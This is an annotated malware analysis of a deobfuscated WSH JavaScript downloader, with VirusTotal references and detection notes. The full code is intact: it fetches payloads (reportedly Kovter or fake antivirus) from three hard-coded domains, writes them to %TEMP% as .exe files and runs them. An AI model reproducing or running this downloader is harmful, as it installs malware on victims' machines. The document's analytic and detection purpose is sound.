- deobfuscated and beautified version of a malicious WSH .js file
- https://www.virustotal.com/en/file/9ffbd096aab7d309e6119663f1c6628ae9fb7d2f5eaeabeaa53ef7b682990103/analysis/
- sends get requests like:
- www.mybusinessdoc.com/document.php?rnd=1071&id=55555C5E031601032405123412345
- lawyermyowin.com/document.php?rnd=1071&id=55555C5E031601032405123412345
- gurutravel.co.nz/document.php?rnd=1071&id=55555C5E031601032405123412345
- when requested with a Windows IE user-agent, the server returns one of:
- kovter:
- https://www.virustotal.com/en/file/8006cb3906911cf0454818d55a9c7e340f34e4ab4d056dce9f40cb9396f00e3a/analysis/
- trapwot fakeav:
- https://www.virustotal.com/en/file/a332f99155f4c1e1dcc7fb68e1f1eb578a7db1e4d05f8d4c40b6ed5b16f3a369/analysis/
- ----------------------
// Campaign / victim identifier: sent verbatim as the `id=` query parameter
// by dl() below. It is constant in this sample, so the full query string is a
// usable network indicator.
var listing="55555C5E031601031234123112341234";
// Downloader stage of the WSH dropper. Tries each hard-coded domain in order,
// fetches /document.php?rnd=<fr>&id=<listing>, and if the response body is
// larger than 5000 bytes writes it to a randomly named .exe under %TEMP% and
// launches it. Stops at the first domain that yields a saved payload.
// @param {number} fr - value sent as the `rnd=` query parameter (see callers)
function dl(fr) {
    // Payload hosts, tried in this order until one delivers a payload.
    var b = "www.mybusinessdoc.com lawyermyowin.com gurutravel.co.nz".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");
        // Drop path: %TEMP%\<random integer 0..100000000>.exe, a fresh name per attempt.
        // Detection angle: wscript.exe/cscript.exe writing and then spawning a
        // numeric-named .exe from %TEMP%.
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0;  // becomes 1 once a response has been saved to disk
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function () {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.open();
                xa.type = 1;  // adTypeBinary: handle the response as raw bytes
                xa.write(xo.ResponseBody);
                // Size gate: bodies of 5000 bytes or less are discarded — presumably
                // to skip error/placeholder pages rather than a real binary (inferred).
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2);  // 2 = adSaveCreateOverWrite
                    try {
                        ws.Run(fn, 1, 0);  // window style 1, wait = 0: launch without blocking
                    } catch (er) {};  // launch failure is ignored; dn stays 1, so the loop still breaks
                };
                xa.close();
            };
        };
        try {
            // Synchronous request (async = false): the readystatechange handler is
            // expected to run inside send(), so dn is already set at the break check.
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + listing, false);
            xo.send();
        } catch (er) {};  // network errors are swallowed; the next domain is tried
        if (dn == 1) break;  // stop after the first successful drop
    }
};
// Three independent runs with different `rnd=` values. Each call walks all
// three domains regardless of the previous call's outcome, so one execution
// can produce up to nine GET requests and up to three dropped executables.
dl(1071);
dl(1382);
dl(3673);